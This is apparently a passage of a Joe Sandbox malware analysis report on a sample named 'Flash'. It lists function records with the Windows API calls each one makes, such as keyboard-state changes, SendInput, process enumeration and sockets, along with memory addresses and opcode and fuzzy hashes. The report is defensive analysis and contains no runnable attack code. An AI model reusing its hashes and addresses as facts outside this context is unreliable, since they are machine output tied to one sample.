                                                        • Opcode Fuzzy Hash: 5fc6ac00dc7188ba964b2a1dc300bacc16e7008e24b4dec2176112d85223c50c
                                                        • Instruction Fuzzy Hash: 50D017719107129FD7219F72DC18B0B7AE8AF05351F198C2AD496E2550E6B0E8C0DA10
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00A51696), ref: 00A51455
                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A51467
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                        • API String ID: 2574300362-4033151799
                                                        • Opcode ID: 0d636e97e5935882dad3e57dc340e43a0fa9cb2782e9eba58c94253fa5c64c33
                                                        • Instruction ID: 64d8ad64f802ec968ce88acbc207fef871ca60fccf70ce9a696e8d57d9a15ae8
                                                        • Opcode Fuzzy Hash: 0d636e97e5935882dad3e57dc340e43a0fa9cb2782e9eba58c94253fa5c64c33
                                                        • Instruction Fuzzy Hash: 1BD012705107129FD720AF75C848B5776F4BF06396B11CD2AD8D5D2550E6B0D4C1CB10
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,009E5E3D), ref: 009E55FE
                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 009E5610
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                        • API String ID: 2574300362-192647395
                                                        • Opcode ID: e0d6ac207976d63efbaf066a97230083a80e2e43f2effc3dbf984cb79929615c
                                                        • Instruction ID: 358f3d30cb87dfe3fcc2b99346141adecf8531f9a3f31bd7e47727795d43a43e
                                                        • Opcode Fuzzy Hash: e0d6ac207976d63efbaf066a97230083a80e2e43f2effc3dbf984cb79929615c
                                                        • Instruction Fuzzy Hash: FFD01775920B129FE7219F72C908A1B76F9AF05759B168C2AD48AD2191E6B0C8C0CA50
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00A493DE,?,00A60980), ref: 00A497D8
                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00A497EA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                        • API String ID: 2574300362-199464113
                                                        • Opcode ID: 6a036fd013c45e02bbb22e1d292d5f99eaf603d7c04e88f1976b9038fcdcfcd6
                                                        • Instruction ID: e783824b5748152a7ce97de209e836d51c7a7c676edd9840f74ead277847d1da
                                                        • Opcode Fuzzy Hash: 6a036fd013c45e02bbb22e1d292d5f99eaf603d7c04e88f1976b9038fcdcfcd6
                                                        • Instruction Fuzzy Hash: F7D017755207139FD7209F71D888A07B6E4BF09391B158C2AD486E2150EBB0C8C0CB11
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?), ref: 00A4E7A7
                                                        • CharLowerBuffW.USER32(?,?), ref: 00A4E7EA
                                                          • Part of subcall function 00A4DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00A4DEAE
                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00A4E9EA
                                                        • _memmove.LIBCMT ref: 00A4E9FD
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                        • String ID:
                                                        • API String ID: 3659485706-0
                                                        • Opcode ID: 0b82a3460c4cc2cd95c011cd66341dc0ee827148340085619fce69591b7014d5
                                                        • Instruction ID: c9bc8aa7ba93ad44f45e5651255bb25b4f310aecd8cc569964e3c5fe5c6737a1
                                                        • Opcode Fuzzy Hash: 0b82a3460c4cc2cd95c011cd66341dc0ee827148340085619fce69591b7014d5
                                                        • Instruction Fuzzy Hash: 5FC15675A083418FC714DF28C480A6ABBE5FF89714F14896EF8999B352D731E946CB82
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 00A487AD
                                                        • CoUninitialize.OLE32 ref: 00A487B8
                                                          • Part of subcall function 00A5DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00A48A0E,?,00000000), ref: 00A5DF71
                                                        • VariantInit.OLEAUT32(?), ref: 00A487C3
                                                        • VariantClear.OLEAUT32(?), ref: 00A48A94
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                        • String ID:
                                                        • API String ID: 780911581-0
                                                        • Opcode ID: d521fdc4bbfdcdf8e1c30a95df6d72e1c553b69b60d4aaf5eb79ffe507053244
                                                        • Instruction ID: a548c1683b2311c3c73dea56bf1b647edfe15fa08d3046810f3fac0ae174a6fd
                                                        • Opcode Fuzzy Hash: d521fdc4bbfdcdf8e1c30a95df6d72e1c553b69b60d4aaf5eb79ffe507053244
                                                        • Instruction Fuzzy Hash: C0A15739204B019FCB10DF64D485B2EB7E5BF88350F14885AF9869B3A2CB74ED44CB92
                                                        APIs
                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00A63C4C,?), ref: 00A28308
                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00A63C4C,?), ref: 00A28320
                                                        • CLSIDFromProgID.OLE32(?,?,00000000,00A60988,000000FF,?,00000000,00000800,00000000,?,00A63C4C,?), ref: 00A28345
                                                        • _memcmp.LIBCMT ref: 00A28366
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: FromProg$FreeTask_memcmp
                                                        • String ID:
                                                        • API String ID: 314563124-0
                                                        • Opcode ID: 96b388812584319c728762e6485c66a7e474c036d695c40958bd0b116e09b906
                                                        • Instruction ID: 25922f830b3910ff5a45d5efb88e10ca1006be392f44f86e94180e282ce8eb6b
                                                        • Opcode Fuzzy Hash: 96b388812584319c728762e6485c66a7e474c036d695c40958bd0b116e09b906
                                                        • Instruction Fuzzy Hash: F3813971A00119EFCB04CFD8C888EEEB7B9FF89315B244568F515AB250DB75AE06CB60
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Variant$AllocClearCopyInitString
                                                        • String ID:
                                                        • API String ID: 2808897238-0
                                                        • Opcode ID: 610abbc451b620b1d168b3ee26d6d23081b6c805d7402603abaf729c9423458e
                                                        • Instruction ID: 7fe36579e7ecb66b6d235dc52c85f734ded5278a86ace941c6c3565602545e09
                                                        • Opcode Fuzzy Hash: 610abbc451b620b1d168b3ee26d6d23081b6c805d7402603abaf729c9423458e
                                                        • Instruction Fuzzy Hash: F25197306087129BDB20AF7DE895B2DF7E5AF45310F30983FE556C76A1DB7099808B15
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00A4F526
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00A4F534
                                                          • Part of subcall function 009E1A36: _memmove.LIBCMT ref: 009E1A77
                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00A4F5F4
                                                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00A4F603
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                        • String ID:
                                                        • API String ID: 2576544623-0
                                                        • Opcode ID: 0d876042a09ddc8d4057c7f299f3ecf038f8ca6959dd7d2e602fedfc537a58f6
                                                        • Instruction ID: c33959c94a85bb08e83803fdb5e478e3b31a804981916cd94d4f4987dc60ef91
                                                        • Opcode Fuzzy Hash: 0d876042a09ddc8d4057c7f299f3ecf038f8ca6959dd7d2e602fedfc537a58f6
                                                        • Instruction Fuzzy Hash: 355169B1104351AFD311EF64D886F6BB7E8EFD8710F10892EF595972A1EB70A904CB92
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                        • String ID:
                                                        • API String ID: 2782032738-0
                                                        • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                        • Instruction ID: 5dbdbff22f0d32eff6c3cc600405fe3600c489629796bbd3fd4338cbd4b8dc46
                                                        • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                        • Instruction Fuzzy Hash: A441D83170070E9BDF28CF69C8809BF77A9AF84760B24853DEA55C7650DBB5DD908B44
                                                        APIs
                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00A2A68A
                                                        • __itow.LIBCMT ref: 00A2A6BB
                                                          • Part of subcall function 00A2A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00A2A976
                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00A2A724
                                                        • __itow.LIBCMT ref: 00A2A77B
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$__itow
                                                        • String ID:
                                                        • API String ID: 3379773720-0
                                                        • Opcode ID: f3736b2dc56286a67c000c421a71fe08d80ea8d4a873ccc025ad316ad48b450a
                                                        • Instruction ID: 8e8882426a2bcbed8b6143da321535ea3781c3c7f6237cbe113b91eaaca04f0c
                                                        • Opcode Fuzzy Hash: f3736b2dc56286a67c000c421a71fe08d80ea8d4a873ccc025ad316ad48b450a
                                                        • Instruction Fuzzy Hash: C141B374A00258AFDF11EF59D846FEE7BB9EF94750F040029F905A3292DB709D84CBA2
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 00A470BC
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00A470CC
                                                          • Part of subcall function 009D4D37: __itow.LIBCMT ref: 009D4D62
                                                          • Part of subcall function 009D4D37: __swprintf.LIBCMT ref: 009D4DAC
                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00A47130
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00A4713C
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$__itow__swprintfsocket
                                                        • String ID:
                                                        • API String ID: 2214342067-0
                                                        • Opcode ID: 2f5b02042cb3762343ae2d33ef409f7fce11cfc4920183ddfb7cc5cc69347974
                                                        • Instruction ID: c327fc6f25388c7a49bd68475225193b1d9d6a25308fd71e1e7ea94c018cf2a8
                                                        • Opcode Fuzzy Hash: 2f5b02042cb3762343ae2d33ef409f7fce11cfc4920183ddfb7cc5cc69347974
                                                        • Instruction Fuzzy Hash: 0541B1757802106FEB20AF68DC8AF2E77E59F84B10F04C559FA199B3D2DBB09D018B91
                                                        APIs
                                                        • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00A60980), ref: 00A46B92
                                                        • _strlen.LIBCMT ref: 00A46BC4
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: _strlen
                                                        • String ID:
                                                        • API String ID: 4218353326-0
                                                        • Opcode ID: 8e72e0b9fa22600866faf93278fd0aa3b96b3d4474b0ca4d64ea0c99c5803612
                                                        • Instruction ID: 8a8651cd1282ae2adcc72593afdf703125c229ad089e8a70c4e85f8296d97b82
                                                        • Opcode Fuzzy Hash: 8e72e0b9fa22600866faf93278fd0aa3b96b3d4474b0ca4d64ea0c99c5803612
                                                        • Instruction Fuzzy Hash: B141C075600108AFCB14EBA4DDD1FAEB3B9EF95310F148155F81A9B292DB30AD41CB91
                                                        APIs
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A58F03
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: InvalidateRect
                                                        • String ID:
                                                        • API String ID: 634782764-0
                                                        • Opcode ID: e9623bef43ee675935e0924b09e7164d50e308b6870ab6d201fff00487fb84d2
                                                        • Instruction ID: e8c084b9cb711bd516a2877711a7eccfce855128696ef615aa53cdfe439d338a
                                                        • Opcode Fuzzy Hash: e9623bef43ee675935e0924b09e7164d50e308b6870ab6d201fff00487fb84d2
                                                        • Instruction Fuzzy Hash: 2F31A034614108BEEB209B58CC46FAD37B6BB09312F144502FE11F62A1DFB9E99CCA51
                                                        APIs
                                                        • ClientToScreen.USER32(?,?), ref: 00A5B1D2
                                                        • GetWindowRect.USER32(?,?), ref: 00A5B248
                                                        • PtInRect.USER32(?,?,00A5C6BC), ref: 00A5B258
                                                        • MessageBeep.USER32(00000000), ref: 00A5B2C9
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                        • String ID:
                                                        • API String ID: 1352109105-0
                                                        • Opcode ID: dec4a091c0170a938d070e99b57dbe4812f879127df7d65413b2e76867c0815f
                                                        • Instruction ID: e100be4b826155f25015dfc6bb573aab4e975077802f1aa6e3e2541f53251185
                                                        • Opcode Fuzzy Hash: dec4a091c0170a938d070e99b57dbe4812f879127df7d65413b2e76867c0815f
                                                        • Instruction Fuzzy Hash: E8417E70A24115DFCB11CF98C884AAD7BF5FF49313F1481A9E8189B255DB30A88ACFB0
                                                        APIs
                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00A31326
                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00A31342
                                                        • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00A313A8
                                                        • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00A313FA
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: d4ade65c3f208799b73e0dbb0d51e8e84b77417bc26797320c0f7ad859a99113
                                                        • Instruction ID: c1b39739b3eda2d9387c7fa76cb436016c47e1ea07ea21e48df8871398e41751
                                                        • Opcode Fuzzy Hash: d4ade65c3f208799b73e0dbb0d51e8e84b77417bc26797320c0f7ad859a99113
                                                        • Instruction Fuzzy Hash: AF316970A44208AEFF34CB658C05BFEBBB9AB44320F04831AF4915A6D1D3B48D829B91
                                                        APIs
                                                        • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00A31465
                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00A31481
                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 00A314E0
                                                        • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00A31532
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: 9cf3af8c0740edae94f3bb39e30daef51740e9e222858c6f18b91c959596cc9d
                                                        • Instruction ID: adf2d065a5df70f8e1058ab2b6946e05acf54094a0f6be0922feb8d061779a3a
                                                        • Opcode Fuzzy Hash: 9cf3af8c0740edae94f3bb39e30daef51740e9e222858c6f18b91c959596cc9d
                                                        • Instruction Fuzzy Hash: 0C315BB09407185EFF34CB659C04FFEBBB5AB85310F08831AF491521D1D3788D959BA1
                                                        APIs
                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00A0642B
                                                        • __isleadbyte_l.LIBCMT ref: 00A06459
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00A06487
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00A064BD
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                        • String ID:
                                                        • API String ID: 3058430110-0
                                                        • Opcode ID: ed0ff02370182989ee12a8e903397f3315acb1b2071e26dab7ccb577d5751e15
                                                        • Instruction ID: 774a20ad35fe0efcc3a470e2259c88da060994582e7873a9dd9661fc41f2b47d
                                                        • Opcode Fuzzy Hash: ed0ff02370182989ee12a8e903397f3315acb1b2071e26dab7ccb577d5751e15
